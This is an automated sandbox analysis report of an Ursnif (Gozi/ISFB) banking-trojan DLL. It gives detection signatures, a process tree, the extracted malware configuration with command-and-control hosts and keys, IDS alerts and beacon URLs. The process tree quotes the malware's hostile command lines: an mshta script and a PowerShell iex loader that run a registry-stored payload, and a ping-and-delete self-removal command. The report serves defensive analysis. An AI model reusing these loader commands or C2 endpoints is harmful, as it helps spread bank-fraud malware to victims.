
Windows Analysis Report
628df1368bdb5.dll

Overview

General Information

Sample Name: 628df1368bdb5.dll
Analysis ID: 633910
MD5: 2ced3a825a7b8d9ad0153b2f8566b357
SHA1: 4b6484602c29c298b5270f2c95e9aeeabb162737
SHA256: f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc
Tags: BRT, dll, gozi, isfb, ita, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 3412 cmdline: loaddll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 4800 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 864 cmdline: rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 1308 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • WerFault.exe (PID: 240 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 408 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5264 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 416 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6848 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 440 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • mshta.exe (PID: 6924 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qiip='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qiip).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sdiwcaphnc -value gp; new-alias -name ixgamvji -value iex; ixgamvji ([System.Text.Encoding]::ASCII.GetString((sdiwcaphnc "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6136 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 1048 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES10A0.tmp" "c:\Users\user\AppData\Local\Temp\vebwfha3\CSC57533E6B898B4B7BB8DAE45DDD64B0AA.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5280 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3864 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES20CD.tmp" "c:\Users\user\AppData\Local\Temp\hpvnexdj\CSC5D09D8212D1C47D8BF5AC4D6502884C9.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6988 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\628df1368bdb5.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 240 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • cleanup
Malware configuration (Ursnif), as extracted:
{"RSA Public Key": "2FCnIUzdNGgeELQ1eLj0bJoMz6Wyhsxr173krpubnAkBznOw2O4zXiS7ovCR4PNNsCIjegHbTvoHWqhvq9RRNZAEBtDWX6mW3yIDXSN0qA1n8qiSRebn1HxZtuyL6FY/BR1nMcmDUet9iMwvlRDxmj+VzyCObUK6W0DHCUtNCB3pyymvgBuZvmOoqHVPJIhNG61j6VPVajqzr24KUke3teaWIZiCXT2orfIpBZFefRCfYuOYhoPg/LDJjkEBPCd72OAc2ekKwF9Tcjmm1Qm9F8aB637Mj7oTJWG5gIc8figdfCIcJsfVqtjVSAcA29hI94eg/OsMoQ7GmaQR3NS4pkbIWbvv0j+obPcxvU7II18=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "37.10.71.138", "185.158.250.51"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Yara matches (memory dumps)
Source | Rule | Description | Author
00000021.00000000.403852849.00000000007B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
00000002.00000003.284358027.00000000057F8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000021.00000000.404491813.00000000007B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000002.00000003.284640245.00000000057F8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
(26 further entries not shown)

Yara matches (unpacked PE files)
Source | Rule | Description | Author
2.3.rundll32.exe.51294a0.10.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
2.2.rundll32.exe.1350000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
2.3.rundll32.exe.56fa4a0.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
2.3.rundll32.exe.56fa4a0.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
2.3.rundll32.exe.51294a0.10.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
(2 further entries not shown)

No Sigma rule has matched
Snort IDS alerts
Timestamp | Source | Destination | SID | Protocol | Classtype
05/25/22-11:18:02.070939 | 192.168.2.4:49770 | 176.10.119.68:80 | 2033204 | TCP | A Network Trojan was detected
05/25/22-11:17:41.032657 | 192.168.2.4:49761 | 13.107.43.16:80 | 2033204 | TCP | A Network Trojan was detected
05/25/22-11:18:02.070939 | 192.168.2.4:49770 | 176.10.119.68:80 | 2033203 | TCP | A Network Trojan was detected
05/25/22-11:17:41.032657 | 192.168.2.4:49761 | 13.107.43.16:80 | 2033203 | TCP | A Network Trojan was detected

AV Detection

Source: 00000002.00000002.452499963.00000000011A0000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: Ursnif (configuration as listed above under Classification)
Source: http://176.10.119.68/ | Avira URL Cloud: Label: phishing
Source: http://176.10.119.68/drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2FxyofSjr6xGLTFfL2L/LNdngFf7rn/OvqAM3OC3xoRemh_2/FyMZKFMI26Y0/0mKxky2p8Sr/xj69YBE0ZOhFjW/zbyinwlKMAyzoBoDXw0WW/UcxtZ3YMxhs_2F9U/e4Hd9_2BGaNBJ3P/kN1X2IxLZzGc_2FIhp/HoxIXKFKE/9P_2FQckxF3sFvknjRk2/jU7nTpV83y_2Bc9IDLG/XJnktZ5U4942/cCc.jlk | Avira URL Cloud: Label: phishing
Source: http://176.10.119.68/drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/j7Ui6TupUgqv9/iXqd_2B6/HweqhRNKjLTfXm8aJ5EbULO/aj_2BCnAUF/p4g6MIba6j8L3cgyw/IecwOJcZqkV3/20iagORn0JW/8cL4QeYiL7dSmN/XiKK0HtesQsvb3dvhwxKN/_2FxNHFHozoDft4H/q_2F2UJyAbE0bmM/3E7KjzSrWV7DjWoo4u/DAXZOu_2FTcV_2B8l/611kp.jlk | Avira URL Cloud: Label: phishing
Source: http://176.10.119.68/drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2Fxy | Avira URL Cloud: Label: phishing
Source: http://176.10.119.68/drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/ | Avira URL Cloud: Label: phishing
Source: http://176.10.119.68/=i_ | Avira URL Cloud: Label: phishing
Source: http://176.10.119.68/drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4VORrrB3C9OpiAUTKW/_2BEa68ZWZM_2F_2/FqQsrqaBoVKq7cT/nta4A0Rkv0C0nGFGba/jEcMhAfEj/i4t0z7q_2FtZbIXHHqGR/Q5KFjk2yTnVCetqf4Mv/o6_2BrnNfrIeaxRno6ljgz/e3ndGuwsYbRUB/3DL_2FNd/OjZb2_2BjErlndqGe5NpZyj/jIT9OJzbG0/KOr4XWJQo/_2FUsze0HrV/HT.jlk | Avira URL Cloud: Label: phishing
Source: http://176.10.119.68/drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4V | Avira URL Cloud: Label: phishing
Source: 628df1368bdb5.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_01355FBB CryptAcquireContextW, memcpy, CryptImportKey, CryptSetKeyParam, memcpy, CryptEncrypt, CryptDecrypt, GetLastError, GetLastError, CryptDestroyKey, GetLastError, CryptReleaseContext, GetLastError
Source: 628df1368bdb5.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: Binary string: uwGXyM.pdb | source: loaddll32.exe, 00000000.00000000.337566379.000000000040D000.00000002.00000001.01000000.00000003.sdmp, 628df1368bdb5.dll
Source: Binary string: ntdll.pdb | source: rundll32.exe, 00000002.00000003.390410461.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.393947886.00000000065C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP | source: rundll32.exe, 00000002.00000003.390410461.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.393947886.00000000065C0000.00000004.00001000.00020000.00000000.sdmp

Networking

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 176.10.119.68 80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49761 -> 13.107.43.16:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49761 -> 13.107.43.16:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49770 -> 176.10.119.68:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49770 -> 176.10.119.68:80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: Joe Sandbox View | ASN Name: AS-SOFTPLUSCH AS-SOFTPLUSCH
Source: global traffic | HTTP traffic detected: GET /drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2FxyofSjr6xGLTFfL2L/LNdngFf7rn/OvqAM3OC3xoRemh_2/FyMZKFMI26Y0/0mKxky2p8Sr/xj69YBE0ZOhFjW/zbyinwlKMAyzoBoDXw0WW/UcxtZ3YMxhs_2F9U/e4Hd9_2BGaNBJ3P/kN1X2IxLZzGc_2FIhp/HoxIXKFKE/9P_2FQckxF3sFvknjRk2/jU7nTpV83y_2Bc9IDLG/XJnktZ5U4942/cCc.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 176.10.119.68 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4VORrrB3C9OpiAUTKW/_2BEa68ZWZM_2F_2/FqQsrqaBoVKq7cT/nta4A0Rkv0C0nGFGba/jEcMhAfEj/i4t0z7q_2FtZbIXHHqGR/Q5KFjk2yTnVCetqf4Mv/o6_2BrnNfrIeaxRno6ljgz/e3ndGuwsYbRUB/3DL_2FNd/OjZb2_2BjErlndqGe5NpZyj/jIT9OJzbG0/KOr4XWJQo/_2FUsze0HrV/HT.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 176.10.119.68 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/j7Ui6TupUgqv9/iXqd_2B6/HweqhRNKjLTfXm8aJ5EbULO/aj_2BCnAUF/p4g6MIba6j8L3cgyw/IecwOJcZqkV3/20iagORn0JW/8cL4QeYiL7dSmN/XiKK0HtesQsvb3dvhwxKN/_2FxNHFHozoDft4H/q_2F2UJyAbE0bmM/3E7KjzSrWV7DjWoo4u/DAXZOu_2FTcV_2B8l/611kp.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 176.10.119.68 | Connection: Keep-Alive | Cache-Control: no-cache
Source: rundll32.exe, 00000002.00000003.339926969.0000000003510000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.329887519.0000000003510000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.10.119.68/
Source: rundll32.exe, 00000002.00000003.339948557.0000000003518000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.329894971.0000000003518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.10.119.68/=i_
Source: rundll32.exe, 00000002.00000003.339948557.0000000003518000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453537625.00000000034AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453772762.0000000003518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.10.119.68/drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4V
Source: rundll32.exe, 00000002.00000003.339948557.0000000003518000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453772762.0000000003518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.10.119.68/drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/
Source: rundll32.exe, 00000002.00000003.329876196.00000000034F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.329894971.0000000003518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.10.119.68/drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2Fxy
Source: rundll32.exe, 00000002.00000002.453750425.0000000003510000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.339926969.0000000003510000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.329887519.0000000003510000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://config.edge.skype.com/drew/A_2BLeg1fA0RcX1Q_2Fs1Y_/2FCJSPM_2B/VSOjJXByZGfS4f_2F/gMPMt_2Fx85L/
Source: rundll32.exe, 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000001A.00000003.466381408.0000021CC386D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001A.00000002.469383609.0000021CAB5FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001A.00000002.469002593.0000021CAB3F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001A.00000002.469383609.0000021CAB5FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001A.00000002.469383609.0000021CAB5FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_01351CA5 ResetEvent, ResetEvent, InternetReadFile, GetLastError, ResetEvent, InternetReadFile, GetLastError

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 864, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 1308, type: MEMORYSTR

E-Banking Fraud

                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 864, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 1308, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.51294a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.1350000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.56fa4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.56fa4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51294a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.57a6b48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.57794a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000021.00000000.403852849.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.404491813.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.451962892.0000000005129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.514581941.0000021CBC11E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330837608.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330869970.0000000005779000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.452499963.00000000011A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.405551688.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.454256522.000000000547F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_01355FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                      System Summary

                      Source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 628df1368bdb5.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 408
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_01354BF1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_01351645
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0135829C
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007BB4B8
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007B9660
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007BEEF8
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007C1864
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007D7850
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007C2830
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007D98A8
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007D80A8
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007B716C
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007CE120
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007B5110
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007B410C
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007CB9E0
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007D51A8
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007C1248
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007C4240
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007DC220
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007D2AD8
